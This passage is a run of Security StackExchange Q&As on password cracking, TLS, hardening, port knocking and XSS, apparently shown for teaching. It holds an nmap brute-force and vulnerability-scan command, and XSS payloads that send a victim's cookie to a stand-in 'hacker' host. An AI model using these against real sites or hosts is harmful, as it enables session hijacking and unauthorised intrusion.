banner,duplicates,nbstat,ssh-hostkey,ssl-cert,vuln,vulscan,brute,creds-summary --script-args vulns.showall,unsafe,vulscanversiondetection=0,brute.mode=pass,userdb=usernames.lst,passdb=passwords.lst,brute.firstOnly -pT:0,1,19,26,42,49,66,79-81,85,105,111,113,135,139,143,264,389,402,407,443-446,457,465,500,502,512-515,523,524,548,554,587,593,623,631,689,705,783,873,888,902,910,912,921,993,995,998,1000,1026,1050,1080,1099-1100,1128,1158,1167,1211,1220,1241,1337,1344,1352,1433,1521,1533,1581,1582,1604,1617,1720,1723,1755,1811-1813,1900,1944,2000-2001,2067,2100,2103,2202,2207,2225,2301-2302,2362,2375,2380,2381,2383,2427,2525,2628,2869,2904,2905,2940,2944,2945,2947,2967,3000,3010,3031,3037,3050,3057,3097,3128,3200,3217,3260,3299,3306,3389,3460,3465,3478,3500,3565,3628,3632,3689-3690,3780,3790,3817,3863,3864,3868,3872,4000-4002,4100,4322,4369,4444,4567,4659,4672,4679,4739,4740,4848,5000,5019,5038,5040,5051,5060-5061,5090-5091,5093,5168,5222,5227,5250,5353,5357,5432,5466,5498,5554-5555,5560,5631,5632,5666,5672,5675,5679,5800-5802,5814,5850,5900,5920,5984,5985,5986,6000-6005,6050,6060,6070,6080,6101,6106,6112,6346,6347,6379,6405,6481,6503,6504,6542,6660-6661,6666-6667,6704-6706,6905,6988,7000-7002,7019,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7579,7580,7626,7634,7770,7777-7778,7787,8000-8001,8008-8010,8014,8020,8023,8028,8030,8040,8080-8082,8085,8087-8091,8095,8140,8161,8180,8200,8222,8300,8400,8443,8471,8500,8503,8776,8787,8812,8834,8880,8888,8899,8980,8999,9000,9002,9060,9080,9082,9084,9090,9100,9160,9191,9200,9256,9292,9390,9391,9443,9495,9788,9855,9900,9901-9902,9990,9999,10000-10001,10008,10050-10051,10202,10203,10616,10628,11000,11211,11234,12000,12174,12203,12221,12345,12397,12401,13364,13500,13722,14001,16102,17185,18881,19150,19810,20010,20031,20034,20049,20101,20111,20171,20222,22222,23472,26000,26122,27000,27017,27960,28784,29118,29168,29169,30000,30718,30821,31001,31337,32764,34205,34443,35871,36412,36422,38080,38292,40007,41025,41080,41523-41524,44334,44443,44818,46823,46824,49152,50000-50001,50013,50030,50060,50070,50075,50090,52822,52869,55553,57772,60010,60030,62514,64623,65535,U:7,9,11,13,17,19,36-37,42,49,53,67,69,88,111,123,135,137,139,161-162,177,213,259,260,407,445,464,500,514,517-521,523,546,555,623,631,657,826,829,921,1069,1194,1434,1558,1604,1645-1646,1701,1812,1900,1967,2000,2049,2055,2221,2302,2362,2427,2727,2746,3001,3283,3401,3478,3544,4045,4104,4500,4665,5060,5350,5351,5353,5355,5405,5432,5555,5632,6481,6502,7001,7004,7777,7983,8905,8906,9999,10080-10081,17185,18233,26198,27444,27960,31337,32767-32774,32822-32823,34555,41250,47545,49152,49599,54321 Just a little effort with nmap can save you a lot of time if you engage with OpenVAS or Metasploit later on. I prefer to run nmap and OpenVAS from within the msfconsole so that all of that data makes it into the MSF database. One could also export tool data to Metasploit-consumable XML, or use a tool like nmap2nessus. An important lesson to learn about vulnerability scanners is that they miss a lot of real-world vulnerabilities. By running nmap/dnmap overnight in the manner described above you will get to see the potential for every single vulnerability path. Most of them won't work at first shot -- nmap/dnmap will tell you that they failed (but not the real "why", even if you think its reason is valid) -- so it is up to you to figure out if the vulnerability can lead to exploitation or not. Go back to the earlier discussion about port-number specific Metasploit and Nmap NSE files, it is even more relevant now. Know the internals of these scripts and how to troubleshoot each line of code that they consist of. A little offset, a small parameter, or a few combinatorial tweaks will grab that shell that every other penetration tester would have missed. | {
"source": [
"https://security.stackexchange.com/questions/373",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140/"
]
} |
379 | Where can I find one? Is there a pot of gold at the end? How do I protect against them? From the Area51 proposal This question was IT Security Question of the Week . Read the Sep 09, 2011 blog entry for more details or submit your own Question of the Week. | Rainbow Tables are commonly confused with another, simpler technique that leverages a compute time-storage tradeoff in password recover: hash tables. Hash tables are constructed by hashing each word in a password dictionary. The password-hash pairs are stored in a table, sorted by hash value. To use a hash table, simple take the hash and perform a binary search in the table to find the original password, if it's present. Rainbow Tables are more complex. Constructing a rainbow table requires two things: a hashing function and a reduction function. The hashing function for a given set of Rainbow Tables must match the hashed password you want to recover. The reduction function must transform a hash into something usable as a password. A simple reduction function is to Base64 encode the hash, then truncate it to a certain number of characters. Rainbow tables are constructed of "chains" of a certain length: 100,000 for example. To construct the chain, pick a random seed value. Then apply the hashing and reduction functions to this seed, and its output, and continue iterating 100,000 times. Only the seed and final value are stored. Repeat this process to create as many chains as desired. To recover a password using Rainbow Tables, the password hash undergoes the above process for the same length: in this case 100,000 but each link in the chain is retained. Each link in the chain is compared with the final value of each chain. If there is a match, the chain can be reconstructed, keeping both the output of each hashing function and the output of each reduction function. That reconstructed chain will contain the hash of the password in question as well as the password that produced it. The strengths of a hash table are that recovering a password is lightning fast (binary search) and the person building the hash table can choose what goes into it, such as the top 10,000 passwords. The weakness compared to Rainbow Tables is that hash tables must store every single hash-password pair. Rainbow Tables have the benefit the person constructing those tables can choose how much storage is required by selecting the number of links in each chain. The more links between the seed and the final value, the more passwords are captured. One weakness is that the person building the chains doesn't choose the passwords they capture so Rainbow Tables can't be optimized for common passwords. Also, password recovery involves computing long chains of hashes, making recovery an expensive operation. The longer the chains, the more passwords are captured in them, but more time is required to find a password inside. Hash tables are good for common passwords, Rainbow Tables are good for tough passwords. The best approach would be to recover as many passwords as possible using hash tables and/or conventional cracking with a dictionary of the top N passwords. For those that remain, use Rainbow Tables. | {
"source": [
"https://security.stackexchange.com/questions/379",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/33/"
]
} |
406 | I've just started to use GPG and created a public key. It is kind of pointless if no-one knows about it. How should I distribute it? Should I post it on my profile on Facebook and LinkedIn? How about my blog? What are the risks? | Best way to distribute your key is by using one of the key servers that are available, such as keyserver.ubuntu.com , pgp.mit.edu or keyserver.pgp.com . If you use Seahorse (default key manager under Ubuntu), it automatically syncs your keys to one of these servers. Users can then look up your key using your email address or keyid. If you wanted to post your public key on LinkedIn or your blog, you can either upload the key to your server or just link to the page for your key on one of the keyservers above. Personally, I would upload it to one of the keyservers and link to it, as it is easier to keep it up-to-date in one place, instead of having the file in loads of different locations. You could also share your keyid with people, and they can then receive your key using gpg --recv-keys . If you wanted to post your public key on Facebook, there is a field to place it under the Contact Info section of your profile. You can also change your Facebook security settings to use this same public key to encrypt their emails to you. For example, here's my public key . To my knowledge, there are no risks associated with publishing your public key. | {
"source": [
"https://security.stackexchange.com/questions/406",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/157/"
]
} |
408 | I'm relying on Firefox to remember my passwords, using a Master Password of more than 25 characters. How secure is this set-up? | In short - Firefox uses triple DES in CBC mode with Master Password. More details: nice article about this topic is here: http://luxsci.com/blog/master-password-encryption-in-firefox-and-thunderbird.html and if you want some more details, here is mozillaZine article: http://kb.mozillazine.org/Master_password . This article gives you a detailed comparison between the major browsers. It is believed that it is safe to store passwords such way, however, I do not trust any software. Maybe it sounds too paranoid, but we can never know where the vulnerability hides. | {
"source": [
"https://security.stackexchange.com/questions/408",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/157/"
]
} |
487 | I know the reasoning behind not letting infinite password attempts - brute force attempts is not a meatspace weakness, but a problem with computer security - but where did they get the number three from? Isn't denial of service a concern when implementing a lockout policy that is easily activated? Is there any hard research showing an optimal number or range to choose before locking out an account that balances actual security threat with usability? Thinking it through, I don't see any measurable security difference between three attempts and 20 attempts with the password complexity generally in use today. (I know this skirts subjectivity, but I'm looking for measurement based opinions) | Recently, at the OWASP AppSec 2010 conference in Orange County, Bill Cheswick from AT&T talked at length about this issue. In brief, there's insufficient research. In long, here are some of his ideas for less painful account locking: Don't count duplicate password attempts (they probably thought they mistyped it) Make the password hint about the primary password, and don't have a (weak) secondary Allow a trusted party to vouch for the user, so he can change his password. Lock the account in increasing time increments Remind the user of password rules. | {
"source": [
"https://security.stackexchange.com/questions/487",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/217/"
]
} |
503 | As a web designer (not a security expert) I wonder: If I allow users to upload content to my website (videos, images and text files), what are the real risks involved? | There's a couple of risks from allowing content to be uploaded onto your site, but how important they are to you will likely depend on exactly how the site you're designing will work. First up is malware upload. If an attacker can upload malware onto your site and that malware is downloaded and executed by your users then that's likely to be a problem. Preventing this usually relies on a combination of restricting the types of file that can be uploaded (one point to note is that you shouldn't just rely on file extension here), and using malware scanning on uploaded content. Of course the scanning side of things will only stop known signatures, and can be bypassed fairly easily. Second potential problem is if they can upload active content and have that executed by your application. So for example if your site uses php, then if they can upload a php script and then get it to run as part of your application then they are likely to be able to take control of the server, or at least access other information that exists in the app. One approach I've seen to addressing this is to ensure that the uploaded files are not placed in the web root and ensuring that the web server will not execute files from that location. A third risk, is users uploaded "illegal" material. This can be a tricky legal question to sort, but if you allow user generated content you're likely to have to deal with it sooner or later. The fix for this seems to be primarily procedural. Have a good relationship with your hosting company and ISP and ensure that you can respond to requests to have content removed quickly, if you're hosting in a jurisdiction that requires content to be taken down if a request comes in (eg, a DMCA request). | {
"source": [
"https://security.stackexchange.com/questions/503",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/218/"
]
} |
622 | Might as well bring this hot topic to here! For those not in the know: https://www.pcisecuritystandards.org/ | A good question, but perhaps you should phrase it "Does PCI harm security". To answer both questions, I would differentiate very roughly between two types of organizations (even though most fall in between these two extremes): Security-conscious organizations, that routinely perform business-risk based analysis, have a comprehensive SDL in place, perform all the right moves, etc. Security-unconscious organizations, that have no interest in anything they are not absolutely forced to do, and especially not if it doesnt make any money. For the second group, PCI absolutely helps, a lot, in the following ways: Awareness (now someone is at least allowed to mention security, and hopefully they're all talking about it) Budget - since otherwise management would never have allocated any resources whatsoever to invest in any form of security, now at least they are forced to at least pay lip-service. Minimal baseline of least common denominator activities. (Hopefully this includes training the developers, which helps more than any regulation...) Basically it forces them to acknowledge security, and hopefully some additional good will come out of it. For the first group, there are two (two and a half) main consequences: There are (rare) situations where the organization has to choose between a real security solution, and compliance with the generic baseline LCD. Budget is now forcefully allocated to the minimal, generic baseline LCD as defined by some external group that knows nothing about their business. (This budget would probably be more useful in different security activities / products / etc). Management is quicker to pass on any security investment that is not mandated directly by the PCI - "if they don't need it / if its good enough for them without, why should we bother?" or "If it was important, PCI would have required it". In this case, PCI is doing more harm than good, since getting them to build in security is not an issue for these orgs. However, one benefit of PCI compliance that is shared across the board: PCI compliance reduces the risk of the penalties of non-compliance. | {
"source": [
"https://security.stackexchange.com/questions/622",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22/"
]
} |
643 | I've heard it said that PHP is inherently insecure. Is this true? Why? | It is pretty hard for a language to be "inherently insecure" by my definition, since a good programmer can adapt. But PHP started out leaving a lot of minefields lying around for novices. The initial versions of PHP paid little attention to security and the design had some big flaws. Security is hard to retrofit into the core software and into the libraries. Security training is hard in the best of circumstances, and even more so when a large subset of the developers are inexperienced and started off with bad defaults. For example, it wasn't until version 4.2.0 that register_globals was disabled by default, so data received over the network was not inserted directly into the global namespace anymore. This feature is finally slated for complete removal in the next version. The early release of PHP and the ease of deploying simple PHP applications also attracted many developers with little security awareness, and ensured a large number of applications, a significant number of which had remotely exploitable vulnerabilities. The size and vulnerability of the deployed base also attracted a lot of interest from the exploit community. Here are some references and useful links PHP Insecurity - Technology Review How secure is PHP? - Stack Overflow References on "inherently insecure": http://www.sitepoint.com/forums/showthread.php?threadid=112694 PHP Security Consortium http://en.wikipedia.org/wiki/PHP#Security | {
"source": [
"https://security.stackexchange.com/questions/643",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/160/"
]
} |
705 | Please correct me if I'm wrong, but my understanding is that SSLv3 and TLSv1 is just a rename of the earlier protocol... but TLSv1 adds the ability to have secured and unsecured traffic on the same port. What are the differences and benefits of all the newer specs of TLS? | I like this blog entry by yaSSL describing the differences: http://www.yassl.com/yaSSL/Blog/Entries/2010/10/7_Differences_between_SSL_and_TLS_Protocol_Versions.html I copied the key snippets from the blog to here: " SSL 3.0 [..] Some major improvements of SSL 3.0 over SSL 2.0 are: Separation of the transport of data from the message layer Use of a full 128 bits of keying material even when using the Export cipher Ability of the client and server to send chains of certificates, thus allowing organizations to use certificate hierarchy which is more than two certificates deep. Implementing a generalized key exchange protocol, allowing Diffie-Hellman and Fortezza key exchanges as well as non-RSA certificates. Allowing for record compression and decompression Ability to fall back to SSL 2.0 when a 2.0 client is encountered TLS 1.0 [..] This was an upgrade from SSL 3.0 and the differences were not dramatic, but they are significant enough that SSL 3.0 and TLS 1.0 don't interoperate. Some of the major differences between SSL 3.0 and TLS 1.0 are: Key derivation functions are different MACs are different - SSL 3.0 uses a modification of an early HMAC while
TLS 1.0 uses HMAC. The Finished messages are different TLS has more alerts TLS requires DSS/DH support TLS 1.1 [..] is an update to TLS 1.0. The major changes are: The Implicit Initialization Vector (IV) is replaced with an explicit IV to protect against Cipher block chaining (CBC) attacks. Handling of padded errors is changed to use the bad_record_mac alert rather than the decryption_failed alert to protect against CBC attacks. IANA registries are defined for protocol parameters Premature closes no longer cause a session to be non-resumable. TLS 1.2 [..] Based on TLS 1.1, TLS 1.2 contains improved flexibility. The major differences include: The MD5/SHA-1 combination in the pseudorandom function (PRF) was
replaced with cipher-suite-specified
PRFs. The MD5/SHA-1 combination in the digitally-signed element was replaced
with a single hash. Signed elements
include a field explicitly specifying
the hash algorithm used. There was substantial cleanup to the client's and server's ability to
specify which hash and signature
algorithms they will accept. Addition of support for authenticated encryption with
additional data modes. TLS Extensions definition and AES Cipher Suites were merged in. Tighter checking of EncryptedPreMasterSecret version
numbers. Many of the requirements were tightened Verify_data length depends on the cipher suite Description of Bleichenbacher/Dlima attack defenses cleaned up. | {
"source": [
"https://security.stackexchange.com/questions/705",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
755 | How does basic HTTP Auth work? | The server sends back a header stating it requires authentication for a given realm. The user provides the username and password, which the browser concatenates (username + ":" + password), and base64 encodes. This encoded string is then sent using a "Authorization"-header on each request from the browser.
Because the credentials are only encoded, not encrypted, this is highly insecure unless it is sent over https. | {
"source": [
"https://security.stackexchange.com/questions/755",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/160/"
]
} |
890 | I see a lot of sites use GUIDs for password resets, unsubscribe requests and other forms of unique identification. Presumably they are appealing because they are easy to generate, unique, non-sequential and seem random. But are they safe enough for these purposes? It seems to me that given a GUID, predicting subsequent GUIDs may be possible since (as far as I know) they're not intended to be cryptographically secure...or are they? Note: I'm not talking about sites that use a random blob of gobbledygook encoded in base64. I'm talking about sites like this that appear to be using a raw guid: http://example.com/forgotPassword/?id=b4684ce3-ca5b-477f-8f4d-e05884a83d3c | Are they safe enough for the purposes you described? In my opinion, generally yes. Are they safe enough in applications where security is a significant concern? No. They're generated using a non-random algorithm, so they are not in any way cryptographically random or secure. So for an unsubscribe or subscription verification function, I really don't see a security issue. To identify a user of an online banking application on the other hand, (or really probably even a password reset function of a site where identity is valuable) GUIDs are definitely inadequate. For more information, you might want to check out section 6 (Security Considerations) of the RFC 4122 for GUIDs (or Universally Unique Identifiers). | {
"source": [
"https://security.stackexchange.com/questions/890",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/545/"
]
} |
894 | I've seen websites placing HTTPS iframes on HTTP pages. Are there any security concerns with this? Is it secure to transmit private information like credit card details in such a scheme (where the information is only placed on the HTTPS iframe form, and not on the HTTP parent page)? | If only the iframe is https, the user cannot trivially see the URL it points to. Therefore, the source http page could be altered to point the iframe anywhere it wanted to. That's pretty much a game-over vulnerability that eliminates the advantages of https. | {
"source": [
"https://security.stackexchange.com/questions/894",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/181/"
]
} |
988 | I'm making a REST-API and it's straight forward to do BASIC auth login. Then let HTTPS secure the connection so the password is protected when the api is used. Can this be considered secure? | There are a few issues with HTTP Basic Auth: The password is sent over the wire in base64 encoding (which can be easily converted to plaintext). The password is sent repeatedly, for each request. (Larger attack window) The password is cached by the webbrowser, at a minimum for the length of the window / process. (Can be silently reused by any other request to the server, e.g. CSRF). The password may be stored permanently in the browser, if the user requests. (Same as previous point, in addition might be stolen by another user on a shared machine). Of those, using SSL only solves the first. And even with that, SSL only protects until the webserver - any internal routing, server logging, etc, will see the plaintext password. So, as with anything it's important to look at the whole picture. Does HTTPS protect the password in transit? Yes. Is that enough? Usually, no. (I want to say, always no - but it really depends on what your site is and how secure it needs to be.) | {
"source": [
"https://security.stackexchange.com/questions/988",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200/"
]
} |
993 | We have already had questions on here about Hardening Apache , Hardening PHP and Securing SSH . To continue this trend I am interested in what steps people take to harden Linux servers. As in what steps do people always take when setting up a new server, that are not application specific. Such as setting the tmp partition to be noexec, uninstalling / disabling certain services, e.t.c. | Identify required applications and processes and apply a checklist to either avoid installing them, or worst case uninstall them after the initial build. Here I'm thinking those common culprits which still seem to go on to far too many distros by default! NFS services: nfsd, lockd, mountd, statd, portmapper telnet server and ftp server R services: rlogin, rsh, rcp, rexec BIND and DNS server unless needed mail servers such as sendmail X11 (unless desktop needed) finger daemon etc Next step up is go through the potential weak services and limit access to them use at.allow and cron.allow to restrict access to crontab Ensure all devices are unreadable and unwriteable by ordinary users (excluding those such as /dev/tty and /dev/null etc) Key files - permissions on these should be owned by root:
/etc/fstab, /etc/password, /etc/shadow Carefully check hosts.equiv - a great source of access here :-) Similarly, NFS config is locked down if it is required Disable unneeded system accounts. Look at filesystem - sticky bits for all executables and public directories. Check all root requirements (PATH environment variable, no remote access as root, group membership, password requirements) Check all user requirements (membership in privileged groups, valid shells, umask, SUID, SGID requirements and of course the SANS guide is a really good source! | {
"source": [
"https://security.stackexchange.com/questions/993",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57/"
]
} |
1,057 | How much can I depend on Tor for anonymity? Is it completely secure? My usage is limited to accessing Twitter and Wordpress. I am a political activist from India and I do not enjoy the freedom of press like the Western countries do. In the event my identity is compromised, the outcome can be fatal. | Tor is better for you than it is for people in countries whose intelligence services run lots of Tor exit nodes and sniff the traffic. However, all you should assume when using Tor is that, if someone's not doing heavy statistical traffic analysis, they can't directly correlate your IP with the IP requesting resources at the server. That leaves many, many methods of compromising your identity still open. For instance, if you check your normal email while using Tor, the bad guys can know that that address is correlated with other Tor activity. If, as @Geek said, your computer is infected with malware, that malware can broadcast your identity outside the Tor tunnel. If you even hit a webpage with an XSS or CSRF flaw, any other web services you're logged into could have their credentials stolen. Bottom line, Tor is better than nothing; but if your life is on the line, use a well-secured computer for accessing Twitter and WordPress using it, and don't use that computer for anything else. | {
"source": [
"https://security.stackexchange.com/questions/1057",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/636/"
]
} |
1,093 | We've had to extend our website to communicate user credentials to a suppliers website (in the query string) using AES with a 256-bit key, however they are using a static IV when decrypting the information. I've advised that the IV should not be static and that it is not in our standards to do that, but if they change it their end we would incur the [big] costs so we have agreed to accept this as a security risk and use the same IV (much to my extreme frustration). What I wanted to know is, how much of a security threat is this? I need to be able to communicate this effectively to management so that they know exactly what they are agreeing to. We are also using the same KEY throughout as well. Thanks | It depends on the chaining mode. AES is a block cipher, it is applied on blocks of 16 bytes (exactly). The chaining mode defines how input data becomes several such blocks, and how output blocks are then put together. Most chaining modes need to work with some sort of "start value", which is not secret but should change for every message: that is the IV. Reusing the same IV is deadly if you use the CTR chaining mode. In CTR mode, AES is used on a sequence of successive counter values (beginning with the IV), and the resulting sequence of encrypted blocks is combined (by bitwise XOR) with the data to encrypt (or decrypt). If you use the same IV then you get the same sequence, which is the infamous "two-time pad". Basically, by XORing two encrypted string together, you get the XOR of the two cleartext data. This opens to an awful lot of attacks, and basically the whole thing is broken. Things are less dire if you use CBC. In CBC, the data itself is broken into 16-byte blocks. When a block is to be encrypted, it is first XORed with the previous encrypted block. The IV has the role of the "-1" block (the previous encrypted block for the first block). The main consequence of reusing the IV is that if two messages begin with the same sequence of bytes then the encrypted messages will also be identical for a few blocks. This leaks data and opens the possibility of some attacks. To sum up, do not do that. Using the same IV with the same key ever and ever defeats the whole purpose of the IV, the reason why a chaining mode with IV was used in the first place. | {
"source": [
"https://security.stackexchange.com/questions/1093",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/653/"
]
} |
1,138 | Following the hardening theme.... What are some best practices, recommendations, required reading for securing MySQL. | Run only MySQL on the Server - If possible run only MySQL on the server and remove any unused services. Firewall - Limit access by IP address to only the servers / clients that require access. User Privileges - When creating users always give the minimum amount of privileges and expand as needed. Also try to avoid using '%' wildcard for hosts and instead limit to the host that requires access. Bind Address Appropriately - If you only require remote access to the server within the same network and the machine has both an external IP and an internal network address. Setup MySQL to only listen on the internal address. Enable Logging - Enable logging if the database doesn’t handle to many queries. mysql_secure_installation - Use the mysql_secure_installation utility which does a number of things including removing anonymous-user accounts, removes the test database etc. Root Account Accessible Local Only - Its best to limit the root account to be accessible only directly from the machine. The mysql_secure_installation does allow you to remove any remote access for root accounts easily. I usually then either ssh to the machine and use the mysql command prompt or MySQL Workbench has functionality to tunnel over SSH. Additional Resources MySQL Security Best Practices (Hardening MySQL Tips) MySQL Best Practices: User Security Security in MySQL | {
"source": [
"https://security.stackexchange.com/questions/1138",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/618/"
]
} |
1,167 | I would like to use https to login to my personal webpage (which is on shared hosting). So I went over to google and started searching for sollutions. Eventualy I found out that I need an SSL certificate to accomplish that (I thought it's all something that automaticaly enabled for each website, don't ask me why). Then I went over to my hosting provider website and found out about the prices of these certificates... But I don't need something like that for my blog... I also found out that certificates can be self-signed, or obtained for free from certain certificate authorities. What I'm wondering is - how should I approach this? Since I'm the only one that's logging in there - should I generate my own certificate? Or get a free one from some CA? If yes - which CA? cacert maybe? Will it all stay transparent this way, or will I start getting warnings about custom and unverified certificate? Can I trust a solution like this? Does it even make sense to try and do something like this if I'm using shared hosting? I mean, from what I've read - this certificate would have to be installed on the server, and not just put somewhere in my hosting folder (as I thought it would work).. and the hosting provider won't do this for free I guess because it's kinda not in their interest (in any case I asked them, and am waiting for reply)... Should I just drop it, or is there anything I can do on my own? | I like using StartCom for a free certificate. Until mid-2016, it was recognized in most major browsers and is better than using a self-signed certificate (No error prompts for users). EDIT 2016 : Major browser vendors like Mozilla , Apple , and Google have announced they (and their browsers) no longer trust StartCom as a certificate authority, due to recently uncovered sketchy behavior by the certificate authority (see links in vendors names for their announcements of this and reason why). Edit 2017 : Let's Encrypt is now a great option for personal use and seems to be accepted even more widely than StartSSL was. Downsides to Let's Encrypt are the relatively short validity of the certificate (3 months) but that is not overly burdensome if you are able to take advantage of the automatic renewal they offer through some of their tooling. | {
"source": [
"https://security.stackexchange.com/questions/1167",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/23/"
]
} |
1,194 | Normally for a server I like to lock down SSH and other non-public service to only be accessible by certain IP addresses. However this is not always practical if the business doesn’t have static IP addresses or if outside developers need access. I heard about Port Knocking a while ago and have finally had chance to look into it as a solution to the above problem. As a result of this I have a load of questions I hope people can help me out with. Has anyone deployed it within their Business / Organisation and can offer any advise? What is the best knocking Daemon to run under Linux? What are the best clients for Linux, Windows and OSX? What is the recommend length for knock sequence and is it best to use TCP, UDP or Both? What are the associated downsides and issues with using it? Is it just Security Through Obscurity? Are there any alternatives to the port knocking
approach? | While I have not deployed it yet, I know many people who have deployed it. Every single one of them have noted a significant reduction in the amount of bandwidth consumed by things like SSH brute-force attacks as a result. However, that is not to say that there are not downsides. AFAIK, there are no kernel-based port knocking implementations available, which for me would be the real key to adoption. Port knocking daemons rely on reading failed (and filtered/prohibited) log file entries from a firewall system. That's all fine and dandy, but what happens if the filesystem gets full? What happens when the daemon gets killed because of some runaway process eating up the system's RAM and swap? What happens if something else which either of those two things depend on just up and stop working? You most likely end up with a server that you will have to physically access. That could wind up being more costly than is reasonable, especially if you are more than a few tens of miles away from the server and do not have anyone that you can call to get there in a hurry. One thing that I can say is that it is not "security through obscurity". Port knocking is a form of authentication, and like any authentication system it can be made to be as simple or complex as desired. Something as simple as "knock on port 10,000 + realPortNumber" can be done, which would amount to a trivial break, or the port knocking might itself be used to transmit some form of real authentication (say, 1 block of AES encoded data given a key derived by some other method). It would not be feasible to use port knocking to transmit large amounts of data, though, because it would take significantly longer than just sending a single packet, and if the packet is over TCP than at least it can be known if it was received successfully or encountered some form of error. One interesting question that this brings up, however, is how to manage the log files---userland implementations mostly require the log files in order to determine whether or not a knock has been successfully sent, and what happens if those logs are leaked? Authentication data becomes known, and that is obviously not a very good thing. I cannot tell you whether or not to use port knocking in your setup. I am not yet, and I am not 100% certain that I ever will be. It makes more sense to me to use strong authentication systems that are based on strong cryptography (such as a PKI infrastructure) than it does to throw port knocking in the way. Also, adding a single point of failure to access critical infrastructure, to me anyway, seems like a bad idea, and way more difficult to properly support with any sort of guarantee. Again, though, that is based on the notion of the port-knocking software being not integrated with the firewall at the operating system kernel level; if that ever changes, I may also change how I feel about using it. | {
"source": [
"https://security.stackexchange.com/questions/1194",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57/"
]
} |
1,300 | I'm developing application for Android/Java. Application is a kind of password manager, so I'm storing encrypted passwords under the hood of master password. There are number of encryption algorithms DES/AES/BlowFish/TwoFish and so on. My intention is to develop application which is free of commercial copyright issues. So the question is: If I will use built-in Java
encryption API's (e.g. DES/AES)- does
it mean that I will be free from
possible commercial interests of
DES/AES alike copyright holders? Any other thoughts, meanings will be helpful also. | There is no copyright on algorithms . Algorithms are like ideas; the kind of intellectual property which applies to them is patents, not copyrights. There are some cryptographic algorithms which are patented, but most are not and some used to be patented (but patents ultimately expire). Neither DES, AES, Blowfish or Twofish is patented. An example of patented symmetric encryption system is IDEA (US patent will expire in 2012). The RSA algorithm (asymmetric encryption and digital signatures) was patented, but the patent expired ten years ago. Basically, if a cryptographic algorithm is made available through an already installed Java VM, then it probably is not patented (anymore, or at all). There can be copyrights on implementations . Using an implementation which is already there is not impacted by the copyright (it is a copyright, not a useright). You have to worry about copyright when you include external code into your application, not when you use external code provided by the installed Java VM through its published API. Software systems can further be controlled by licenses . One could imagine a specific license which prohibits using some of the software depending on usage context or just any arbitrary condition. One could imagine such a software license on the implementation of a cryptographic algorithm. This would be the problem of whoever uses your software, not your problem. The Java VM license is the one which applies here. But, as far as I know, there is no usage restriction on the Java VM components, be they cryptographic or not. The VM vendor usually does not wish to restrict usage of his API. Local laws may apply, especially on the matter of encryption. Depending on the country, laws may limit usage, distribution, export and/or import of software using cryptographic algorithms. The Java VM (at least, the one from Sun/Oracle) includes a relatively complex system of permissions and security rules which determines which algorithms are available, and with which key lengths. Thus, it can be assumed that whatever algorithm is made available to applications by the VM has already been tuned with regards to key lengths in order to comply with local laws. There can always be exceptions in some situations (if you are a North-Korean agent hard at work building a nuclear bomb somewhere in South Dakota, then using cryptographic algorithms, even if legally provided by the installed Java VM, might imply a few extra years of jail when the FBI gets you). In practical terms, you should check the export laws of your country if you distribute software which provides some kind of encryption service, notably if you put it on a Web site. Summary: there is no intellectual property related worry to have about using cryptographic algorithms provided by the Java VM. You should make some inquiries about regulations on cryptographic software distribution and export. You can begin by the Wikipedia pages on crypto export and import . | {
"source": [
"https://security.stackexchange.com/questions/1300",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/814/"
]
} |
1,368 | I have very little experience in web development, but I'm interested in security. However, I haven't fully understood how XSS works. Can you explain it to med? The Wikipedia article give me a good idea but I don't think I understand it very well. | XSS - Cross Site Scripting (but not limited to actual cross site scripting) XSS is usually presented in 3 different ways: Non-persistent (often called reflected XSS) This is when you are able to inject code and the server returns it back to you, unsanitized. Often this can be exploited by distributing an (usually innocent looking) URL in some form or way for others to click on. This can be particular effective when you're dealing with focused attacks against someone. As long as you can make someone click the URL you sent there is a chance you can gain elevated privileges on the system. Example: A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this: "><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT> Sitting on the other end, at the webserver, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their sessionID and hijack the session. Using techniques like spam email, message board posts, IM messages, Social Engineering Toolkits this vulnerability can be very dangerous. DOM-based Very similar to non-persistent, but where the javascript payload does not have to be echoed back from the webserver. This can often be where simply the value from an URL parameter is echoed back onto the page on the fly when loading using already resident javascript. Example: http://victim/displayHelp.php?title=FAQ#<script>alert(document.cookie)</script> Of course criminals would modify the URL to make it more innocent looking. The same payload as above just encoded differently: http://victim/displayHelp.php?title=FAQ#<scri
#112t>alert(docum
ent.cookie)</sc
ript> You can even mask it better when sending to email clients that support HTML like this: <a href="http://victim/displayHelp.php?title=FAQ#<script>alert(document.cookie)
